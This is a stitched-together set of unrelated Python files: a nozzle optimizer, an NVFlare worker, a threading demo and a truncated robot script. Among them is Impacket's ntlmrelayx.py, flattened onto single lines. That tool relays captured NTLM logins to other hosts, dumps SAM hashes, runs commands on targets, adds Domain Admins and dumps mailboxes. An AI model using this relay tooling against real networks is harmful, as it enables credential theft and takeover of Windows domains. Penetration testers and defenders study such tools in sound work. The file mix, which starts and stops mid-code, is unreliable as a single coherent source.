        if sess and sess.is_valid:
            return sess
        else:
            return None

    def get_session(self, session_id: str, create: bool = False) -> Session:
        """Return the live session for ``session_id``.

        When no valid session exists, a new one is created only if
        ``create`` is True; otherwise None is returned.  (Fix: the
        original implementation ignored the ``create`` flag and always
        created a session.)
        """
        sess = self._get_session(session_id)
        if sess:
            sess._set_last_acessed_time(time.time())
            return sess
        if not create:
            return None
        with self.__session_lock:
            session = self._create_local_session(session_id)
            self.__sessions[session.id] = session
            self._start_cleaning()
            return session


set_session_factory(LocalSessionFactory())
aerospike_optimizer.py
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize
import multiprocessing as mp
import copy
import pickle

import gasdynamics as gd
from heat_flux import heat_flux
from plug_nozzle_angelino import plug_nozzle
import MOC


## NASA CEA CONSTANTS
class CEA_constants():
    def __init__(self, altitude):
        """Class that should eventually query NASA CEA data; for now holds
        all values constant.

        Args:
            altitude (float): altitude in meters (currently unused)

        Returns:
            Stores NASA CEA data in attributes
        """
        self.gamma = 1.237  # np.mean([1.2534,1.2852])
        self.T_c = 2831.47      # combustion chamber temperature [K]
        self.p_c = 3102640.8    # combustion chamber pressure [Pa]
        self.rho_c = 3.3826     # combustion chamber density [kg/m^3]
        # combustion chamber sound speed
        self.a_c = np.sqrt(self.gamma * (1 - 1 / self.gamma) * 200.07 * self.T_c)
        self.Pr = 0.55645       # average throat-to-exit Prandtl number
        self.cp = 1.724         # [kJ/kg-K] average throat-to-exit cp
        self.c = 0.003883468    # [millipoise/K^w] viscosity-temperature coeff.
        self.w = 0.678083301    # viscosity-temperature exponent


class aerospike_optimizer():
    """Optimizes an aerospike nozzle contour.

    Args:
        r_e (float): outer radius of aerospike nozzle
        T_w (float): desired nozzle wall temperature
        alpha (float): weighting of thrust in the cost function
        beta (float): weighting of cooling requirement in the cost function
        design_alt_init (float): initial design altitude
        truncate_ratio_init (float): initial truncation length
        chr_mesh_n (int): number of expansion waves for MOC
        no_alt_range (float): number of altitude points to optimize over
        no_core (int>0): number of cores used in computation

    Public entry points:
        cost_opt_contour_params(params): cost with spike.x / spike.y as inputs
        cost_opt_design_params(params): cost with design_alt / truncate_ratio
    """

    def __init__(self, r_e, T_w, alpha, beta, design_alt_init,
                 truncate_ratio_init, chr_mesh_n=120, no_alt_range=30,
                 no_core=1):
        self.r_e = r_e
        self.T_w = T_w
        self.alpha = alpha
        self.beta = beta
        self.design_alt_init = design_alt_init
        self.truncate_ratio_init = truncate_ratio_init
        self.chr_mesh_n = chr_mesh_n
        # round the altitude count to a multiple of no_core so np.split works
        self.no_alt_range_int = int(no_core * round(no_alt_range / no_core))
        self.no_core = no_core
        self.CEA = CEA_constants(0)
        self.spike_init = self.__design_angelino_nozzle(
            design_alt_init, truncate_ratio_init, self.CEA, r_e)
        self.spike_opt = copy.deepcopy(self.spike_init)

    def __compute_thrust_over_range(self, plug_nozzle_class, alt_range, gamma,
                                    send_end, downstream_factor=1.2,
                                    chr_mesh_n=50):
        """Compute thrust at each altitude in alt_range (worker process body).

        Args:
            plug_nozzle_class (plug_nozzle): nozzle whose thrust is computed
            alt_range (np.array): altitudes [m] to evaluate
            gamma (float): ratio of specific heats
            send_end (mp.connection.Connection): pipe end to send results to
            downstream_factor (float): how far past the contour MOC continues
            chr_mesh_n (int>0): number of lip expansion waves for MOC

        Returns:
            None; sends the thrust array through send_end.
        """
        thrust_range = np.zeros(alt_range.shape)
        for i in range(alt_range.shape[0]):
            MOC_mesh = MOC.chr_mesh(plug_nozzle_class, gamma, alt_range[i],
                                    chr_mesh_n,
                                    downstream_factor=downstream_factor)
            thrust_range[i] = MOC_mesh.compute_thrust('linear', 200)
            print(thrust_range[i])
        send_end.send(thrust_range)

    def __multicore_thrust_compute(self, plug_nozzle_class, altitude_range,
                                   gamma, downstream_factor=1.2,
                                   chr_mesh_n=50, no_core=1):
        """Fan the thrust computation out over no_core processes and gather
        the per-altitude results back in the original order of the split."""
        proc_list = []
        pipe_list = []
        alt_range_split = np.split(altitude_range, no_core)
        for i in range(no_core):
            recv_end, send_end = mp.Pipe(False)
            args = (plug_nozzle_class, alt_range_split[i], gamma, send_end,
                    downstream_factor, chr_mesh_n)
            proc = mp.Process(target=self.__compute_thrust_over_range,
                              args=args)
            proc_list.append(proc)
            pipe_list.append(recv_end)
            proc.start()
        for proc in proc_list:
            proc.join()
        thrust_range = np.concatenate([x.recv() for x in pipe_list])
        plt.plot(altitude_range, thrust_range, 'o')
        return thrust_range

    def __design_angelino_nozzle(self, design_alt, truncate_ratio, CEA, r_e):
        """Size an Angelino plug nozzle perfectly expanded at design_alt."""
        (p_atm, T_atm, rho_atm) = gd.standard_atmosphere([design_alt])
        PR = CEA.p_c / p_atm
        M_e = gd.PR_expansion_mach(PR, CEA.gamma)
        expansion_ratio = gd.expansion_ratio(1, M_e, CEA.gamma)
        # max expansion (r_b = 0, r_e**2 >= A_t*expansion_ratio/np.pi)
        A_t = r_e**2 * np.pi / expansion_ratio
        return plug_nozzle(expansion_ratio, A_t, r_e, CEA.gamma, CEA.T_c,
                           CEA.p_c, CEA.a_c, CEA.rho_c, 1500,
                           truncate_ratio=truncate_ratio)

    def __cost_end_func(self, no_alt_range_int, spike, CEA,
                        downstream_factor=1.2, chr_mesh_n=120, no_core=1):
        """Shared tail of both cost functions: integrate thrust over the
        altitude range and compute the nozzle heat flux.

        Returns:
            (work, total_heat_flux) tuple of floats.
        """
        alt_range = np.linspace(0, 9144, no_alt_range_int)
        # shuffle so each core receives work of similar average complexity
        np.random.shuffle(alt_range)
        (p_atm_r, T_atm_r, rho_atm_r) = gd.standard_atmosphere(alt_range)
        thrust_range = self.__multicore_thrust_compute(
            spike, alt_range, CEA.gamma, downstream_factor=downstream_factor,
            chr_mesh_n=chr_mesh_n, no_core=no_core)
        # unshuffle before integrating
        ordered_idx = np.argsort(alt_range)
        alt_range = alt_range[ordered_idx]
        thrust_range = thrust_range[ordered_idx]
        work = np.trapz(thrust_range, alt_range)
        plt.plot(alt_range, thrust_range, 'o')
        plt.show()  # NOTE: blocks until the plot window is closed
        print('work = ' + str(work))
        ## heat transfer required
        # Fix: the original referenced the bare name T_w, which only exists
        # as a global when this file is run as a script; use the instance's
        # wall temperature instead.
        total_heat_flux = heat_flux(CEA.Pr, CEA.cp, CEA.gamma, CEA.c, CEA.w,
                                    CEA.T_c, self.T_w, spike)
        return (work, total_heat_flux)

    def __cost_func_contour_params(self, params, spike, T_w, CEA, alpha, beta,
                                   chr_mesh_n, no_alt_range_int, no_core):
        """Cost as a function of the raw contour points (x then y halves).
        T_w is kept in the signature for wrapper compatibility; the wall
        temperature actually used is self.T_w."""
        params = np.asarray(params)
        if len(params.shape) > 1:
            raise ValueError('Input params not correct shape. Should be 1D array')
        x_vals, y_vals = np.split(params, 2)
        spike.x = x_vals
        spike.y = y_vals
        work, total_heat_flux = self.__cost_end_func(
            no_alt_range_int, spike, CEA, downstream_factor=5.0,
            chr_mesh_n=chr_mesh_n, no_core=no_core)
        print('Total Heat = ' + str(total_heat_flux))
        return -alpha * work + beta * total_heat_flux

    def __cost_func_design_params(self, params, T_w, CEA, r_e, alpha, beta,
                                  chr_mesh_n, no_alt_range_int, no_core):
        """Cost as a function of [design_alt, truncate_ratio]."""
        params = np.asarray(params)
        if len(params.shape) > 1:
            raise ValueError('Input params not correct shape. Should be 1D array')
        design_alt, truncate_ratio = np.split(params, 2)
        spike = self.__design_angelino_nozzle(design_alt, truncate_ratio,
                                              CEA, r_e)
        work, total_heat_flux = self.__cost_end_func(
            no_alt_range_int, spike, CEA, downstream_factor=1.2,
            chr_mesh_n=chr_mesh_n, no_core=no_core)
        print('work = ' + str(work))
        return -alpha * work + beta * total_heat_flux

    def cost_opt_contour_params(self, params):
        """params = np.concatenate((spike_opt.x, spike_opt.y))"""
        return self.__cost_func_contour_params(
            params, self.spike_opt, self.T_w, self.CEA, self.alpha, self.beta,
            self.chr_mesh_n, self.no_alt_range_int, self.no_core)

    def cost_opt_design_params(self, params):
        """params = [design_alt, truncation_ratio]"""
        return self.__cost_func_design_params(
            params, self.T_w, self.CEA, self.r_e, self.alpha, self.beta,
            self.chr_mesh_n, self.no_alt_range_int, self.no_core)


if __name__ == '__main__':
    ## CONSTANTS OF DESIGN FOR AERODYNAMICS
    r_e = 0.027  # 0.034  # likely too large

    ## CONSTANTS OF DESIGN FOR HEAT FLUX
    T_w = 600  # [K] desired wall temperature of nozzle

    ## CONSTANTS OF SIM
    alpha = 1  # 0.07/8 : 1 ratio of alpha : beta gives very similar weights
    beta = 0
    design_alt = 9144
    truncate_ratio = 1  # bounds on truncate < 0.1425

    CEA = CEA_constants(0)  # not a functioning class as of now

    optimizer = aerospike_optimizer(r_e, T_w, alpha, beta, design_alt,
                                    truncate_ratio, chr_mesh_n=150,
                                    no_alt_range=16, no_core=4)

    def old_vs_new_spike():
        """Plot the optimized spike contour against the old (6000 m) design."""
        optimizer = aerospike_optimizer(r_e, T_w, alpha, beta, design_alt,
                                        truncate_ratio, chr_mesh_n=100,
                                        no_alt_range=32, no_core=4)
        optimizer_old = aerospike_optimizer(r_e, T_w, alpha, beta, 6000,
                                            truncate_ratio, chr_mesh_n=100,
                                            no_alt_range=32, no_core=4)
        plt.plot(optimizer.spike_init.x, optimizer.spike_init.y, 'b-',
                 optimizer.spike_init.lip_x, optimizer.spike_init.lip_y, 'bx',
                 label='Optimized Spike')
        plt.plot(optimizer_old.spike_init.x, optimizer_old.spike_init.y, 'r--',
                 optimizer_old.spike_init.lip_x, optimizer_old.spike_init.lip_y,
                 'rx', label='Old Spike')
        plt.plot([optimizer_old.spike_init.x[-1], optimizer_old.spike_init.x[-1]],
                 [optimizer_old.spike_init.y[-1], 0], 'r--')
        plt.plot([optimizer.spike_init.x[-1], optimizer.spike_init.x[-1]],
                 [optimizer.spike_init.y[-1], 0], 'b-')
        plt.plot(optimizer.spike_init.x,
                 np.zeros(optimizer.spike_init.x.shape), 'k-')
        plt.axis('equal')
        plt.legend()
        plt.show()

    # old_vs_new_spike()
    optimizer.cost_opt_design_params([design_alt, truncate_ratio])
    # Further optimization scaffolding (scipy.optimize.minimize /
    # basinhopping with bound constraints, pickling of results) was left
    # commented out in the original and is omitted here.
ntlmrelayx.py
#!/usr/bin/env python # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Generic NTLM Relay Module # # Authors: # Alberto Solino (@agsolino) # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) # # Description: # This module performs the SMB Relay attacks originally discovered # by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc). # It receives a list of targets and for every connection received it # will choose the next target and try to relay the credentials. Also, if # specified, it will first to try authenticate against the client connecting # to us. # # It is implemented by invoking a SMB and HTTP Server, hooking to a few # functions and then using the specific protocol clients (e.g. SMB, LDAP). # It is supposed to be working on any LM Compatibility level. The only way # to stop this attack is to enforce on the server SPN checks and or signing. # # If the authentication against the targets succeeds, the client authentication # succeeds as well and a valid connection is set against the local smbserver. # It's up to the user to set up the local smbserver functionality. One option # is to set up shares with whatever files you want to so the victim thinks it's # connected to a valid SMB server. All that is done through the smb.conf file or # programmatically. 
# import argparse import sys import logging import cmd import urllib2 import json from threading import Thread from impacket import version from impacket.examples import logger from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer ) class MiniShell(cmd.Cmd): def __init__(self, relayConfig, threads): cmd.Cmd.__init__(self) self.prompt = 'ntlmrelayx> ' self.tid = None self.relayConfig = relayConfig self.intro = 'Type help for list of commands' self.relayThreads = threads self.serversRunning = True @staticmethod def printTable(items, header): colLen = [] for i, col in enumerate(header): rowMaxLen = max([len(row[i]) for row in items]) colLen.append(max(rowMaxLen, len(col))) outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)]) # Print header print outputFormat.format(*header) print ' '.join(['-' * itemLen for itemLen in colLen]) # And now the rows for row in items: print outputFormat.format(*row) def emptyline(self): pass def do_targets(self, line): for url in self.relayConfig.target.originalTargets: print url.geturl() return def do_socks(self, line): headers = ["Protocol", "Target", "Username", "Port"] url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays" try: proxy_handler = urllib2.ProxyHandler({}) opener = urllib2.build_opener(proxy_handler) response = urllib2.Request(url) r = opener.open(response) result = r.read() items = json.loads(result) except Exception, e: logging.error("ERROR: %s" % str(e)) else: if len(items) > 0: self.printTable(items, header=headers) else: logging.info('No Relays Available!') def do_startservers(self, line): if not self.serversRunning: start_servers(options, self.relayThreads) 
self.serversRunning = True logging.info('Relay servers started') else: logging.error('Relay servers are already running!') def do_stopservers(self, line): if self.serversRunning: stop_servers(self.relayThreads) self.serversRunning = False logging.info('Relay servers stopped') else: logging.error('Relay servers are already stopped!') def do_exit(self, line): print "Shutting down, please wait!" return True def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c def stop_servers(threads): todelete = [] for thread in threads: if isinstance(thread, RELAY_SERVERS): thread.server.shutdown() todelete.append(thread) # Now remove threads from the set for thread in todelete: threads.remove(thread) del thread # Process 
command-line arguments. if __name__ == '__main__': # Init the example's logger theme logger.init() print version.BANNER #Parse arguments parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will " "try to relay that connection to specified target(s) system or the original client") parser._optionals.title = "Main options" #Main arguments parser.add_argument("-h","--help", action="help", help='show this help message and exit') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, ' 'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client') parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or ' 'full URL, one per line') parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list ' 'automatically (only valid with -tf)') parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead' 'of executing a command after a successful relay. 
This console will listen locally on a ' ' tcp port and can be reached with for example netcat.') # Interface address specification parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to ' 'bind SMB and HTTP servers',default='') parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)') parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER') parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot ' 'directory in which gathered loot such as SAM dumps will be stored (default: current directory).') parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes ' 'will be added for ntlm and ntlmv2') parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' '"%s"). 
If errors are detected, run chcp.com at the target, ' 'map the result with ' 'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py ' 'again with -codec and the corresponding codec ' % sys.getdefaultencoding()) parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)') parser.add_argument('-socks', action='store_true', default=False, help='Launch a SOCKS proxy for the connection relayed') parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, ' 'setting the proxy host to the one supplied.') parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed ' 'before serving a WPAD file.') parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4') #SMB arguments smboptions = parser.add_argument_group("SMB client options") smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. ' 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on ' 'target system. 
If not specified, hashes will be dumped (secretsdump.py must be in the same ' 'directory).') smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') #MSSQL arguments mssqloptions = parser.add_argument_group("MSSQL client options") mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute' '(can specify multiple)') #LDAP options ldapoptions = parser.add_argument_group("LDAP client options") ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks') ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one') #IMAP options imapoptions = parser.add_argument_group("IMAP client options") imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. ' 'If not specified, will search for mails containing "password"') imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. 
Default: INBOX') imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, ' 'dump all emails') imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump ' '(0 = unlimited, default: no limit)') try: options = parser.parse_args() except Exception as e: logging.error(str(e)) sys.exit(1) if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) else: logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) # Let's register the protocol clients we have # ToDo: Do this better somehow from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS if options.codec is not None: codec = options.codec else: codec = sys.getdefaultencoding() if options.target is not None: logging.info("Running in relay mode to single host") mode = 'RELAY' targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS) else: if options.tf is not None: #Targetfile specified logging.info("Running in relay mode to hosts in targetfile") targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS) mode = 'RELAY' else: logging.info("Running in reflection mode") targetSystem = None mode = 'REFLECTION' if options.r is not None: logging.info("Running HTTP server in redirect mode") if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() threads = set() socksServer = None if options.socks is True: # Start a SOCKS proxy in the background socksServer = SOCKS() socksServer.daemon_threads = True socks_thread = Thread(target=socksServer.serve_forever) socks_thread.daemon = True socks_thread.start() threads.add(socks_thread) c = start_servers(options, threads) print "" logging.info("Servers started, waiting for connections") try: if 
options.socks: shell = MiniShell(c, threads) shell.cmdloop() else: sys.stdin.read() except KeyboardInterrupt: pass else: pass if options.socks is True: socksServer.shutdown() del socksServer for s in threads: del s sys.exit(0)
sub_worker_process.py
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import argparse
import copy
import os
import threading
import time
import traceback
from multiprocessing.connection import Listener, Client

from nvflare.fuel.sec.security_content_service import SecurityContentService
from nvflare.apis.fl_component import FLComponent
from nvflare.apis.fl_constant import FLContextKey
from nvflare.apis.fl_context import FLContext
from nvflare.apis.signal import Signal
from nvflare.apis.utils.fl_context_utils import get_serializable_data
from nvflare.fuel.common.multi_process_executor_constants import CommunicateData, CommunicationMetaData
from nvflare.private.fed.client.client_run_manager import ClientRunManager


class EventRelayer(FLComponent):
    """Relays FL events between this rank sub-process and its parent process."""

    def __init__(self, conn, local_rank):
        """
        Args:
            conn: multiprocessing connection to the parent's event endpoint.
            local_rank: rank number of this sub-process.
        """
        super().__init__()
        self.conn = conn
        self.local_rank = local_rank

        # Serializes the send/recv round-trip in handle_event() so concurrent
        # events cannot interleave messages on the shared connection.
        self.event_lock = threading.Lock()

    def relay_event(self, run_manager, data):
        """Re-fire an event received from the parent process locally."""
        with run_manager.new_context() as fl_ctx:
            event_type = data[CommunicationMetaData.EVENT_TYPE]
            fl_ctx.props.update(data[CommunicationMetaData.FL_CTX].props)

            # Mark the origin so handle_event() below does not relay the
            # event straight back to the parent.
            fl_ctx.set_prop(
                FLContextKey.EVENT_ORIGIN_SITE, CommunicateData.MULTI_PROCESS_EXECUTOR, private=True, sticky=False
            )
            self.fire_event(event_type=event_type, fl_ctx=fl_ctx)

    def handle_event(self, event_type: str, fl_ctx: FLContext):
        """Forward locally fired events to the parent process (unless they
        originated there) and merge the parent's context updates back into
        ``fl_ctx``."""
        event_site = fl_ctx.get_prop(FLContextKey.EVENT_ORIGIN_SITE)

        new_fl_ctx = FLContext()
        new_fl_ctx.props.update(copy.deepcopy(get_serializable_data(fl_ctx).props))
        if event_site != CommunicateData.MULTI_PROCESS_EXECUTOR:
            with self.event_lock:
                try:
                    data = {
                        CommunicationMetaData.EVENT_TYPE: event_type,
                        CommunicationMetaData.RANK_NUMBER: self.local_rank,
                        CommunicationMetaData.FL_CTX: new_fl_ctx,
                    }

                    self.conn.send(data)

                    return_data = self.conn.recv()
                    # update the fl_ctx from the child process return data.
                    fl_ctx.props.update(return_data[CommunicationMetaData.FL_CTX].props)
                except BaseException:
                    # Best effort: a broken pipe to the parent must not kill
                    # the local event chain.
                    self.log_warning(
                        fl_ctx, f"Failed to relay the event to parent process. Event: {event_type}", fire_event=False
                    )


def main():
    """Entry point of one rank sub-process.

    Establishes the three per-rank connections to the parent (execute,
    handle-event, event-relay), rebuilds the run manager from the first
    message on the execute connection, then runs the worker threads until
    the parent sends CLOSE.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
    # parser.add_argument("--parent_port", type=str, help="Parent listen port", required=True)
    parser.add_argument("--ports", type=str, help="Listen ports", required=True)
    # parser.add_argument("--local_rank", type=int, default=0)
    args = parser.parse_args()

    # Ports arrive as a "-"-separated list; each rank owns three consecutive
    # entries: execute, handle-event and event-relay (see indexing below).
    listen_ports = list(map(int, args.ports.split("-")))
    # parent_port = args.parent_port

    startup = os.path.join(args.workspace, "startup")
    SecurityContentService.initialize(content_folder=startup)

    # local_rank = args.local_rank
    local_rank = int(os.environ["LOCAL_RANK"])

    listen_port = listen_ports[local_rank * 3]
    exe_conn = _create_connection(listen_port)

    listen_port = listen_ports[local_rank * 3 + 1]
    handle_conn = _create_connection(listen_port)

    listen_port = listen_ports[local_rank * 3 + 2]
    event_conn = None
    # The parent listens on this third port; retry until it is up.
    while not event_conn:
        try:
            address = ("localhost", listen_port)
            event_conn = Client(address, authkey=CommunicationMetaData.PARENT_PASSWORD.encode())
        except Exception as e:
            time.sleep(1.0)
            pass

    # First message on the execute connection carries everything needed to
    # reconstruct the run manager in this process.
    data = exe_conn.recv()

    client_name = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.CLIENT_NAME)
    run_number = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.CURRENT_RUN)
    workspace = data[CommunicationMetaData.FL_CTX].get_prop(FLContextKey.WORKSPACE_OBJECT)
    run_manager = ClientRunManager(
        client_name=client_name,
        run_num=int(run_number),
        workspace=workspace,
        client=None,
        components=data[CommunicationMetaData.COMPONENTS],
        handlers=data[CommunicationMetaData.HANDLERS],
        conf=None,
    )

    relayer = EventRelayer(event_conn, local_rank)
    run_manager.add_handler(relayer)
    run_manager.components[CommunicationMetaData.RELAYER] = relayer

    executor = data[CommunicationMetaData.LOCAL_EXECUTOR]

    # Acknowledge startup to the parent before entering the worker loops.
    exe_conn.send({CommunicationMetaData.RANK_PROCESS_STARTED: True})

    exe_thread = threading.Thread(target=execute, args=(run_manager, local_rank, exe_conn, executor))
    exe_thread.start()

    event_thread = threading.Thread(target=handle_event, args=(run_manager, local_rank, handle_conn))
    event_thread.start()

    with run_manager.new_context() as fl_ctx:
        fl_ctx.set_prop(FLContextKey.RANK_NUMBER, local_rank, private=True, sticky=True)
        num_of_processes = int(len(listen_ports) / 3)
        fl_ctx.set_prop(FLContextKey.NUM_OF_PROCESSES, num_of_processes, private=True, sticky=True)

    exe_thread.join()
    event_thread.join()


def _create_connection(listen_port):
    """Accept exactly one incoming connection from the parent on ``listen_port``."""
    address = ("localhost", int(listen_port))
    listener = Listener(address, authkey=CommunicationMetaData.CHILD_PASSWORD.encode())
    conn = listener.accept()
    return conn


def execute(run_manager, local_rank, exe_conn, executor):
    """Worker loop: run EXECUTE commands from the parent until CLOSE.

    On CLOSE, triggers the abort signal of any in-flight execution before
    leaving the loop.
    """
    try:
        abort_signal = None
        while True:
            data = exe_conn.recv()
            command = data[CommunicationMetaData.COMMAND]
            if command == CommunicateData.EXECUTE:
                with run_manager.new_context() as fl_ctx:
                    abort_signal = Signal()

                    task_name = data[CommunicationMetaData.TASK_NAME]
                    shareable = data[CommunicationMetaData.SHAREABLE]
                    fl_ctx.props.update(data[CommunicationMetaData.FL_CTX].props)

                    shareable = executor.execute(
                        task_name=task_name, shareable=shareable, fl_ctx=fl_ctx, abort_signal=abort_signal
                    )

                    # Only rank 0 reports the result back to the parent.
                    if local_rank == 0:
                        return_data = {
                            CommunicationMetaData.SHAREABLE: shareable,
                            CommunicationMetaData.FL_CTX: get_serializable_data(fl_ctx),
                        }
                        exe_conn.send(return_data)
            elif command == CommunicateData.CLOSE:
                if abort_signal:
                    abort_signal.trigger(True)
                break
    except Exception:
        traceback.print_exc()
        print("If you abort client you can ignore this exception.")


def handle_event(run_manager, local_rank, exe_conn):
    """Worker loop: relay HANDLE_EVENT commands from the parent until CLOSE."""
    try:
        while True:
            data = exe_conn.recv()
            command = data[CommunicationMetaData.COMMAND]
            if command == CommunicateData.HANDLE_EVENT:
                event_relayer = run_manager.get_component(CommunicationMetaData.RELAYER)
                event_relayer.relay_event(run_manager, data)

                fl_ctx = data[CommunicationMetaData.FL_CTX]
                # Only rank 0 returns the updated context to the parent.
                if local_rank == 0:
                    return_data = {CommunicationMetaData.FL_CTX: get_serializable_data(fl_ctx)}
                    exe_conn.send(return_data)
            elif command == CommunicateData.CLOSE:
                break
    except Exception:
        traceback.print_exc()
        print("If you abort client you can ignore this exception.")


if __name__ == "__main__":
    """
    This is the program for running rank processes in multi-process mode.
    """
    main()
threading1.py
import threading


def thread_job():
    """Work for the first added thread: report which thread runs it."""
    print("This is an added Thread, number is %s" % threading.current_thread())


def thread_job2():
    print("why only first thread")


def main():
    """Start two worker threads and print the current thread bookkeeping."""
    # BUG FIX: the original passed ``target=thread_job()`` / ``thread_job2()``,
    # which CALLS each job in the main thread and hands Thread its return
    # value (None) as the target -- so the "added" threads did nothing.
    # Pass the function objects themselves instead.
    added_thread = threading.Thread(target=thread_job)
    added_thread2 = threading.Thread(target=thread_job2)
    added_thread2.start()
    added_thread.start()
    print(threading.active_count())
    print(threading.enumerate())
    print(threading.current_thread())


if __name__ == '__main__':
    main()
exp_dispersion_cb.py
"""Makes BlueBot aggregate. """ import RPi.GPIO as GPIO GPIO.setwarnings(False) GPIO.setmode(GPIO.BCM) import os import time import threading import numpy as np from math import * from picamera import PiCamera from lib_utils import * from lib_photodiode import Photodiode from lib_depthsensor import DepthSensor from lib_fin import Fin from lib_leds import LEDS from lib_vision import Vision os.makedirs('./data/{}/'.format(U_FILENAME)) ''' from PIL import Image os.makedirs('./data/{}/'.format(U_FILENAME)) os.makedirs('./data/{}/imgs_r'.format(U_FILENAME)) os.makedirs('./data/{}/imgs_l'.format(U_FILENAME)) ''' def initialize(): """Initializes all threads which are running fins and a logger instance for the overall status """ threading.Thread(target=caudal.run).start() threading.Thread(target=dorsal.run).start() threading.Thread(target=pecto_l.run).start() threading.Thread(target=pecto_r.run).start() leds.on() time.sleep(1) leds.off() def idle(): """Waiting for starting signal """ thresh_photodiode = 40 # lights off: 2, lights on: 400 -> better range! while photodiode.brightness > thresh_photodiode: photodiode.update() time.sleep(3) t_blink = time.time() for blink in range(U_UUID): leds.on() time.sleep(0.2) leds.off() time.sleep(0.2) elapsed_time = time.time() - t_blink sleep_time = 10 - elapsed_time time.sleep(sleep_time) def terminate(): """Terminates all threads which are running fins """ caudal.terminate() dorsal.terminate() pecto_l.terminate() pecto_r.terminate() leds.on() time.sleep(1) leds.off() 